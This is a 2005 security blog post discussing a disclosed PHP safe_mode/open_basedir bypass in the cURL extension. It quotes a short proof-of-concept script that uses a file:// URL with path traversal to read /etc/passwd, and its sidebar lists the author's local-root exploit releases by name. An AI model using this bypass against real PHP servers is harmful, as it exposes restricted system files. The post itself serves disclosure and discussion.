.comment-link {margin-left:.6em;}
Xavier's Security Post
Tuesday, October 18, 2005
  openbasedir / safemode bypass via GD / cURL
on Date: Mon, 17 Oct 2005 22:55:26 +0200 a post on Full Disclosure came through to my inbox. "PHP Safedir Restriction Bypass Vulnerabilities" was its title and my reaction was weeee! after reading through the post I realized the vulnerabilities do not affect the core of PHP, but two extensions. GD, and cURL. Exerpts from the post goes as follows:


...

curl openbasedir and safemode bypass.
POC:

<?php

mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("
file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd
");

$file=curl_exec($ch);

echo $file;

?>



I always wondered if such an attack was even possible, since I had an understanding that extensions are run under PHP's directives. But now this is interesting -- one has to wonder how many other PHP extensions are capable of bypassing safemode/openbasedir at this instant.
 
Comments: Post a Comment

Links to this post:

Create a Link



<< Home
This public blog will be a place for me to output any Security findings, both technological and physical, that I have come about. I will post Security advisories I was apart of, and also other interesting bits of knowledge. email: xavier [at] tigerteam.se

RECENT RELEASES
Rocks Clusters <=4.1 mount-loop local root
Rocks Clusters <=4.1 umount-loop local root
TSEAD-200606-6 - Rocks Clusters <=4.1 local root
xorgmodroot.py - Xorg-server 1.0 / <=X11R6.9.0-7.0 local root
TSEAD-200509-5 - Multiple Netscape.com vulnerabilities.
TSEAD-200512-3 - Multiple vulnerabilities in KISBG <=v5.1.1
fsigk_exp.py - FSIGK for Linux <=2.10-431 local root
TSEAD-200510-4 - FSIGK for Linux <=2.10-431 advisory
ritk.php - remote inclusion pentest tool
owm_exp.py - openwebmail <=2.51+ local root
perliodebug_exp.py - perlIO_debug 5.8.* local root
bankfix.py - bank card number lookup tool
TSEAD-200412-2 - AOL XSS/file read vuln
TSEAD-200412-1 - AOL redir vuln

ARCHIVES
September 2005 / October 2005 / November 2005 / December 2005 / March 2006 / April 2006 / May 2006 / June 2006 / July 2006 / September 2006 / October 2006 /